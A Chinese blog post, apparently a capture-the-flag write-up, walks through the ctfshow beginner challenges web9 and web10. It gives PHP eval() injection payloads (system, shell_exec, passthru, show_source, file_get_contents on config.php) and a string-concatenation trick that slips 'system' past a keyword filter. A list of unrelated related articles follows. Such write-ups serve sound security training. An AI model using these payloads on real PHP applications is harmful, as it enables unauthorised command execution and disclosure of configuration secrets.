ctfshow之_萌新web9至web10

2024-05-09 11:44
文章标签 ctfshow web9 萌新 web10

本文主要是介绍ctfshow之_萌新web9至web10,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

一、访问在线靶场ctfshow

1、web9

如下图所示,进入_萌新赛的web9问题,题目提醒flag在config.php中:

 如上图所示,可以get传参,且传入的参数需要正则匹配system、exec、highlight,且不区分大小写,eval()可以远程执行命令。

尝试传入参数c=system('ls');,如下图所示:

 可以查看到2个文件,再尝试查看第一个文件的内容,传入参数c=system('cat con*');,页面显示空白,火狐浏览器F12,查看器查看时,看到flag,如下图所示:

 另外,这里可以使用c=system('tac con*');,即倒着输出config.php文件的内容,如下图所示:

 尝试传入参数c=echo shell_exec('tac con*');,如下图所示:

 注意system()和shell_exec()的区别,一个会给浏览器显示,一个不会显示(所以需要echo专门来显示一下)。

尝试传入参数c=highlight_file('config.php');,如下图所示:

 2、web10

 如下图所示,进入_萌新赛的web10问题,题目提醒flag在config.php中:

如上图所示,可以get传参,且传入的参数不能正则匹配system、exec、highlight,且不区分大小写,eval()可以远程执行命令。

尝试传入参数c=passthru('tac con*');,如下图所示:

 尝试传入参数c=show_source('config.php');,如下图所示:

尝试传入参数c=echo file_get_contents('config.php');,火狐浏览器F12,查看器中可以查看到flag,如下图所示:

 注意:show_souce()、file_get_contents(),需要传入文件全名称,不可用通配符来匹配了。

show_souce()会将文件以html输出到浏览器;file_get_contents()读取文件内容,并以字符串返回,所以需要echo来显示出来。

尝试传入c=$a='sys';$b='tem';$d=$a.$b;$d('tac con*');,即传入的参数在进行正则匹配验证时,可以通过,且这多条php语句在eval()中可以顺次执行,最终拼装成了system('tac con*');,如下图所示:

这篇关于ctfshow之_萌新web9至web10的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/973322

相关文章

【Linux】萌新看过来!一篇文章带你走进Linux世界

🚀个人主页:奋斗的小羊 🚀所属专栏:Linux 很荣幸您能阅读我的文章,诚请评论指点,欢迎欢迎 ~ 目录 前言💥1、初识Linux💥1.1 什么是操作系统?💥1.2 各种操作系统对比💥1.3 现代Linux应用💥1.4 Linux常用版本 💥2、Linux 和 Windows 目录结构对比💥2.1 文件系统组织方式💥2.2

C++入门(03)萌新问题多(一)(未完待续)

文章目录 1. 一闪而过使用system("pause")使用cin.get() 1. 一闪而过 .exe 在用户计算机上运行后“一闪而过”,是因为控制台程序没有专门的用户图形界面,程序执行完所有代码后默认完成任务自动关闭 使用system(“pause”) 在程序的结尾处加入 system(“pause”),程序在执行完毕后等待用户按任意键继续。这是最简单的方法。 使

ctfshow-爆破(web21-web28)

web21 提交用户和密码后发现没有用户以及密码的值呢  常见的是在post数据中 或者url后传值 但这里都没有 发现http头有一个Authorization字段 值是base64编码后的 解码 原来是将传入的值用冒号分离进行base64编码然后放到了Authorization字段中了 设置变量 增加前缀 增加编码方式 取消选项 记住 只要payload存在一下

***萌新6:24点(爆搜)

链接:登录—专业IT笔试面试备考平台_牛客网 来源:牛客网   题目描述 在扑克牌中有种玩法叫做24点,目标是用给定的四张牌通过基本的数学运算(加、减、乘、除)得到24。24点的玩法规则如下: 1. 准备一副扑克牌,去掉大小王,使用 `A,2,3,4,5,6,7,8,9,10,J,Q,K` 分别表示 `1,2,3,4,5,6,7,8,9,10,11,12,13`。每种各四张,共52张牌。 2.

萌新6:16进制世界(dp)

题目描述 这是一个16进制的世界,比如522的16进制是20A。 在5月22日那天,有人送给Bob一些月饼,每个月饼有饱食度和幸福度两个属性。 现在Bob有nnn个月饼,对于每个月饼iii,饱食度为viv_ivi​,幸福度为wiw_iwi​。 Bob现在有mmm饱食度,意味着他吃的月饼的饱食度之和不大于mmm。 但是由于Bob身处16进制的世界,他吃的月饼的幸福度之和必须是16的倍数。

【靶场】CTFshow—vip限免题目11~20

🏘️个人主页: 点燃银河尽头的篝火(●’◡’●) 如果文章有帮到你的话记得点赞👍+收藏💗支持一下哦 【靶场】CTFshow—vip限免题目11~20 域名txt记录泄露敏感信息公布内部技术文档泄露编辑器配置不当密码逻辑脆弱探针泄露CDN穿透js敏感信息泄露前端密钥泄露数据库恶意下载 域名txt记录泄露 提示:域名其实也可以隐藏信息,比如ctfshow.com 就

CtfShow中的misc17解法

第一步: 首先拿随波逐流打开看看,没发现啥突破点,很正常 第二步:使用kali中的binwalk命令,解析出一个文件夹,打开压缩包后发现没什么东西     第三步:结合题目给的提示,使用tweakpng打开图片进行IDAT合并,combine all iDAt 第四步:继续用binwalk命令来解析,得到一个新的文件夹 ,里面有一个D6E文件,可以直接查看也可以放到Window

ctfshow(web入门-命令执行)-1

1.web29 只有当c参数的值不包含“flag”(区分大小写),才会执行这段代码 $c = $_GET['c'];if(!preg_match("/flag/i", $c)){eval($c);} 只要payload中没有flag即可 先尝试cat (右键源代码)  tail,tac皆可 system("tail fla*"); tac 逆序读  tail 默认读后1

ctfshow之web58~web71

目录 web58 思路一: 思路二:  思路三:    web59~web65 web66~web67  web68~web70 web71 web58 if(isset($_POST['c'])){$c= $_POST['c'];eval($c);}else{highlight_file(__FILE__);} PHP eval() 函数介绍 定义和用法 e

河南萌新2024第二场

H 狼狼的备忘录 题目大意: 给定n本备忘录,里面记录了一个人的m个星座信息,要求按一下要求整理备忘录 A:同一个成员的星座信息 x 是星座信息 y 的后缀,那么星座信息 x 会没有星座信息 y 完整,从而应该只保留星座信息 y ,删除星座信息 x 。同一个成员的星座信息可能以相同格式出现多次,那么只保留该信息一次。 思路: 通过备忘录的整理规则 set < string >容器可以完